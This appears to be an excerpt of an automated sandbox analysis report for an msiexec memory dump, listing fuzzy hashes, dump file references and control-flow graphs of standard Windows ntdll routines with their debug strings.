                                            • Instruction ID: 08c48d8db1fff4a7aae0ade1d007b50f5096adb9759b3a80f9f3e295fbdad943
                                            • Opcode Fuzzy Hash: 7549eb4d2f5fa2ce06e84ea4e8da8457b023238eac9ecfe8aa1b3ef163911986
                                            • Instruction Fuzzy Hash: F39002B520240403D650B158580565A004A4BD0311F95D411B4424628D875489A1A221
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b9840955a7ac02f6b43458a58dea3de42d09bd8f93a7c27ce2be7cbbe173f5e
                                            • Instruction ID: 224077f6ecf554add58991ef44cd67ef67dd1ad62f2688dcf5f91bf532ae11f6
                                            • Opcode Fuzzy Hash: 2b9840955a7ac02f6b43458a58dea3de42d09bd8f93a7c27ce2be7cbbe173f5e
                                            • Instruction Fuzzy Hash: FC9002B1203401439680B2585805A5E41094BE1312BD5D415B4015624CCA1489615321
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e6eaf7301d7ab0bc0290a8cabdfbedd6dcbf3c7755a7e35ef904abd03c9985f
                                            • Instruction ID: 731fabd2f4189fc0e0efefc6ec0af320d6b19c7e6aa0b375cd261f3b0f66cf6a
                                            • Opcode Fuzzy Hash: 4e6eaf7301d7ab0bc0290a8cabdfbedd6dcbf3c7755a7e35ef904abd03c9985f
                                            • Instruction Fuzzy Hash: 3E9002A921340003D2C0B158540961E00094BD1212FD5D415B4015628CCA1589695321
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e968f1205f1c20f29a34684f6ceef2778679e166fc0dcec4e06b83116ccbc59d
                                            • Instruction ID: 7a6bc7b827897ddf5121ee028b6fec46146bd11cd0c10b3108f3d8189f430e52
                                            • Opcode Fuzzy Hash: e968f1205f1c20f29a34684f6ceef2778679e166fc0dcec4e06b83116ccbc59d
                                            • Instruction Fuzzy Hash: 469002A120644443D240B5585409A1A00094BD0215F95D011B5064665DC7358951A231
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d86f46981cf74881dcb0455c9c0837eb92212c1923279ac95cb0bbac8aaa8ad
                                            • Instruction ID: a17645061e61d5e6a9781eda1a872edc05a5f05230178ea123c980cc99e583fb
                                            • Opcode Fuzzy Hash: 8d86f46981cf74881dcb0455c9c0837eb92212c1923279ac95cb0bbac8aaa8ad
                                            • Instruction Fuzzy Hash: F99002A130240003D280B158541961A40099BE1311F95D011F4414624CDA1589565322
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03661bb3b8e406c5664c4af59d484569a6c1afc8127b481d85f1b3764e81446e
                                            • Instruction ID: 9c09155718f2e5fdabf15533781b101ea9fe1e203e4c2b77b9a8159652496068
                                            • Opcode Fuzzy Hash: 03661bb3b8e406c5664c4af59d484569a6c1afc8127b481d85f1b3764e81446e
                                            • Instruction Fuzzy Hash: 029002A160640403D280B158541971A00194BD0211F95D011B4024624DC7598B5567A1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d17740521a8ef6dfd5ac9c9689b4725e6338a8c55f905ce1706e72682e5d1cae
                                            • Instruction ID: ca6ea46b35a7aa3d506c241fae23ca93ce81b8a2d7e2d3d377ab3d2ce62a2efd
                                            • Opcode Fuzzy Hash: d17740521a8ef6dfd5ac9c9689b4725e6338a8c55f905ce1706e72682e5d1cae
                                            • Instruction Fuzzy Hash: 079002B120240403D240B158550971B00094BD0211F95D411B4424628DD75689516221
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f38b20b82313bd0c09e48dce1245813bf919177d5b3ed83335601ef4034d3d6a
                                            • Instruction ID: 30ef708ceda91a8957d99a5665eba0690bf32a11b163852fee4337400d631306
                                            • Opcode Fuzzy Hash: f38b20b82313bd0c09e48dce1245813bf919177d5b3ed83335601ef4034d3d6a
                                            • Instruction Fuzzy Hash: E99002B120240403D240B598540965A00094BE0311F95D011B9024625EC76589916231
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c91b44b1e6fbc99c307f4f4555615472c8c5853c9b213fd5ce7c1115db7b424b
                                            • Instruction ID: 918a7f6ebf8b30da4d2bd045286b7aae742567779b174e506acb1060504ccfcc
                                            • Opcode Fuzzy Hash: c91b44b1e6fbc99c307f4f4555615472c8c5853c9b213fd5ce7c1115db7b424b
                                            • Instruction Fuzzy Hash: AE9002B120240843D240B1584405B5A00094BE0311F95C016B4124724D8715C9517621
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d0e5367972622c8839314668f829e229a27b76d404b0417ee65fec1bef3aa4c
                                            • Instruction ID: 0916c6ca110264fcb8c1346c78ffa30ff6bb1caf4976cb3d41783f251b63fd86
                                            • Opcode Fuzzy Hash: 9d0e5367972622c8839314668f829e229a27b76d404b0417ee65fec1bef3aa4c
                                            • Instruction Fuzzy Hash: 709002B120240803D2C0B158440565E00094BD1311FD5C015B4025724DCB158B5977A1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ce331c5f7c742be10c1d0d2a1ab62c4f312b0cee8fd4610882277445f3c522e
                                            • Instruction ID: e12c36288323b4c407a00ff13c931f17a8b8c8617f3b4d452d7ef4c818b82399
                                            • Opcode Fuzzy Hash: 9ce331c5f7c742be10c1d0d2a1ab62c4f312b0cee8fd4610882277445f3c522e
                                            • Instruction Fuzzy Hash: 799002B120644843D280B1584405A5A00194BD0315F95C011B4064764D97258E55B761
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ccae3d969843b828b50ffb23a4b7d3ea902a73f7ad0b0086a28b3d0eb84437bf
                                            • Instruction ID: d75c39720601e6004ce8a2a9c6f56637e94435b5fe0a450db6521d2060ff1700
                                            • Opcode Fuzzy Hash: ccae3d969843b828b50ffb23a4b7d3ea902a73f7ad0b0086a28b3d0eb84437bf
                                            • Instruction Fuzzy Hash: 649002B120240803D244B158480569A00094BD0311F95C011BA024725E976589917231
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c235e4867528b7a4ad1edd4de91cb162ff30d84bc0f638720a1ef1ed1b69adb
                                            • Instruction ID: d0281487a5fcc07f8aa57b7307ba8f587f7ec200163ea0cd2689ae7c906249ee
                                            • Opcode Fuzzy Hash: 3c235e4867528b7a4ad1edd4de91cb162ff30d84bc0f638720a1ef1ed1b69adb
                                            • Instruction Fuzzy Hash: E69002B160640803D290B158441575A00094BD0311F95C011B4024724D87558B5577A1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cd299f8ec26a84c32f942a0250b414cf8521903e8a90636d4288a888789d8cde
                                            • Instruction ID: 16c4e1845f5fda2b527ad3604bd231df9f290ab2e04769c1c951f03867c946da
                                            • Opcode Fuzzy Hash: cd299f8ec26a84c32f942a0250b414cf8521903e8a90636d4288a888789d8cde
                                            • Instruction Fuzzy Hash: 9A9002E1203400034245B158441562A400E4BE0211B95C021F5014660DC62589916225
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8d34d5e384f6725d048195bd19853791d244037cca566e0b56a52fa3e8d1987
                                            • Instruction ID: 0d61a891b797c1bc44c08d57971213fbc58ed175070cdf5fbbe6b36836170e7f
                                            • Opcode Fuzzy Hash: d8d34d5e384f6725d048195bd19853791d244037cca566e0b56a52fa3e8d1987
                                            • Instruction Fuzzy Hash: BB9002A5212400030245F558070551B004A4BD5361395C021F5015620CD72189615221
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d9a163758bc86b17eb5a510a41abfd08ea4adbcfa9ebaa3a6a881172aa989a6b
                                            • Instruction ID: 24b5848662e1d4d63d7a3a02db04576335927e306d97b60037ba165dc3f6f50f
                                            • Opcode Fuzzy Hash: d9a163758bc86b17eb5a510a41abfd08ea4adbcfa9ebaa3a6a881172aa989a6b
                                            • Instruction Fuzzy Hash: 799002A5222400030285F558060551F04495BD63613D5C015F5416660CC72189655321
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 107266c70fcf9358370c632e026b2cd616dbb9dab9ea22702572ab54cb06f71c
                                            • Instruction ID: 10ab83240f06d1fedd7b7bdcb9abab83058a1deff254583d7e6b5ffbea9a2543
                                            • Opcode Fuzzy Hash: 107266c70fcf9358370c632e026b2cd616dbb9dab9ea22702572ab54cb06f71c
                                            • Instruction Fuzzy Hash: B69002E1202540934640F2588405B1E45094BE0211B95C016F5054630CC62589519235
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 879bd381e3236984f486657c3399e673a868d5fa890cd29e7cdcae5553b3d401
                                            • Instruction ID: 09ff2a0dcbbfe23a3531fad52d4057462782936469228989c0ef0e0ccf25f6eb
                                            • Opcode Fuzzy Hash: 879bd381e3236984f486657c3399e673a868d5fa890cd29e7cdcae5553b3d401
                                            • Instruction Fuzzy Hash: 969002A124645103D290B15C440562A40096BE0211F95C021B4814664D865589556321
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c3f41ce7a2ca10c56465c069c484695d07f36aac82ca33ec32b5497e82392f4
                                            • Instruction ID: 9e453da39c3d21799b358913f3d27d3d80650f051e18ce9f5da99c91242f26af
                                            • Opcode Fuzzy Hash: 6c3f41ce7a2ca10c56465c069c484695d07f36aac82ca33ec32b5497e82392f4
                                            • Instruction Fuzzy Hash: A89002E1602500434280B158480541A60095BE13113D5C115B4554630C871889559369
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: efb3c5344cd4d9b30714e2d36249b2b8ae4c5ed24c7749f41244c14838c37d95
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 250 1fd52890-1fd528b3 251 1fd8a4bc-1fd8a4c0 250->251 252 1fd528b9-1fd528cc 250->252 251->252 255 1fd8a4c6-1fd8a4ca 251->255 253 1fd528dd-1fd528df 252->253 254 1fd528ce-1fd528d7 252->254 258 1fd528e1-1fd528e5 253->258 254->253 257 1fd8a57e-1fd8a585 254->257 255->252 256 1fd8a4d0-1fd8a4d4 255->256 256->252 259 1fd8a4da-1fd8a4de 256->259 257->253 260 1fd52988-1fd5298e 258->260 261 1fd528eb-1fd528fa 258->261 259->252 262 1fd8a4e4-1fd8a4eb 259->262 263 1fd52908-1fd5290c 260->263 264 1fd8a58a-1fd8a58d 261->264 265 1fd52900-1fd52905 261->265 267 1fd8a4ed-1fd8a4f4 262->267 268 1fd8a564-1fd8a56c 262->268 263->258 266 1fd5290e-1fd5291b 263->266 264->263 265->263 269 1fd52921 266->269 270 1fd8a592-1fd8a599 266->270 271 1fd8a50b 267->271 272 1fd8a4f6-1fd8a4fe 267->272 268->252 273 1fd8a572-1fd8a576 268->273 274 1fd52924-1fd52926 269->274 278 1fd8a5a1-1fd8a5c9 ___swprintf_l 270->278 276 1fd8a510-1fd8a536 ___swprintf_l 271->276 272->252 275 1fd8a504-1fd8a509 272->275 273->252 277 1fd8a57c ___swprintf_l 273->277 279 1fd52993-1fd52995 274->279 280 1fd52928-1fd5292a 274->280 275->276 281 1fd8a55d-1fd8a55f 276->281 277->281 279->280 286 1fd52997-1fd529b1 ___swprintf_l 279->286 283 1fd52946-1fd52966 ___swprintf_l 280->283 284 1fd5292c-1fd5292e 280->284 285 1fd52981-1fd52985 281->285 288 1fd52969-1fd52974 283->288 284->283 287 1fd52930-1fd52944 ___swprintf_l 284->287 286->288 287->283 288->274 289 1fd52976-1fd52979 288->289 289->278 290 1fd5297f 289->290 290->285
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 72b985d69d1f27d4b1dd18012477b1ea4f55bc7dbb226f01adcdd4efeb300857
                                            • Instruction ID: 6f2c91c44944279f784561511ceae37d3d95e4847979a4e5f8d30fe5df30e4e9
                                            • Opcode Fuzzy Hash: 72b985d69d1f27d4b1dd18012477b1ea4f55bc7dbb226f01adcdd4efeb300857
                                            • Instruction Fuzzy Hash: F3510CB5A04256BFCF51DFA8CD8057EFBB8BB492017108269F4A4D7641E334EE448BE0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 429 1fd47630-1fd47651 430 1fd47653-1fd4766f call 1fd1e660 429->430 431 1fd4768b-1fd47699 call 1fd54c30 429->431 436 1fd84638 430->436 437 1fd47675-1fd47682 430->437 440 1fd8463f-1fd84645 436->440 438 1fd47684 437->438 439 1fd4769a-1fd476a9 call 1fd47818 437->439 438->431 447 1fd47701-1fd4770a 439->447 448 1fd476ab-1fd476c1 call 1fd477cd 439->448 442 1fd476c7-1fd476d0 call 1fd47728 440->442 443 1fd8464b-1fd846b8 call 1fd9f290 call 1fd59020 BaseQueryModuleData 440->443 442->447 453 1fd476d2 442->453 443->442 466 1fd846be-1fd846c6 443->466 451 1fd476d8-1fd476e1 447->451 448->440 448->442 455 1fd476e3-1fd476f2 call 1fd4771b 451->455 456 1fd4770c-1fd4770e 451->456 453->451 460 1fd476f4-1fd476f6 455->460 456->460 462 1fd47710-1fd47719 460->462 463 1fd476f8-1fd476fa 460->463 462->463 463->438 465 1fd476fc 463->465 467 1fd847be-1fd847d0 call 1fd52c50 465->467 466->442 469 1fd846cc-1fd846d3 466->469 467->438 469->442 471 1fd846d9-1fd846e4 469->471 472 1fd847b9 call 1fd54d48 471->472 473 1fd846ea-1fd84723 call 1fd9f290 call 1fd5aaa0 471->473 472->467 479 1fd8473b-1fd8476b call 1fd9f290 473->479 480 1fd84725-1fd84736 call 1fd9f290 473->480 479->442 485 1fd84771-1fd8477f call 1fd5a770 479->485 480->447 488 1fd84781-1fd84783 485->488 489 1fd84786-1fd847a3 call 1fd9f290 call 1fd8cf9e 485->489 488->489 489->442 494 1fd847a9-1fd847b2 489->494 494->485 495 1fd847b4 494->495 495->442
                                            Strings
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1FD84655
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 1FD84787
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1FD84742
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1FD84725
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1FD846FC
                                            • Execute=1, xrefs: 1FD84713
                                            • ExecuteOptions, xrefs: 1FD846A0
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: b36b2762a6efcce356c571e6197d2e3f204bbea46622dcb3a07fbba3649ab5e6
                                            • Instruction ID: b2c2b3f410d270ab4ccc1961bb53d344344051cb55eee5d32fdfca6a19a8d91c
                                            • Opcode Fuzzy Hash: b36b2762a6efcce356c571e6197d2e3f204bbea46622dcb3a07fbba3649ab5e6
                                            • Instruction Fuzzy Hash: 7C513735600319ABDF909BA4DC85FFE77B9EF45300F2201A9D905AB5D0EB71BA458F60
                                            Strings
                                            • RTL: Resource at %p, xrefs: 1FD87B8E
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 1FD87B7F
                                            • RTL: Re-Waiting, xrefs: 1FD87BAC
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
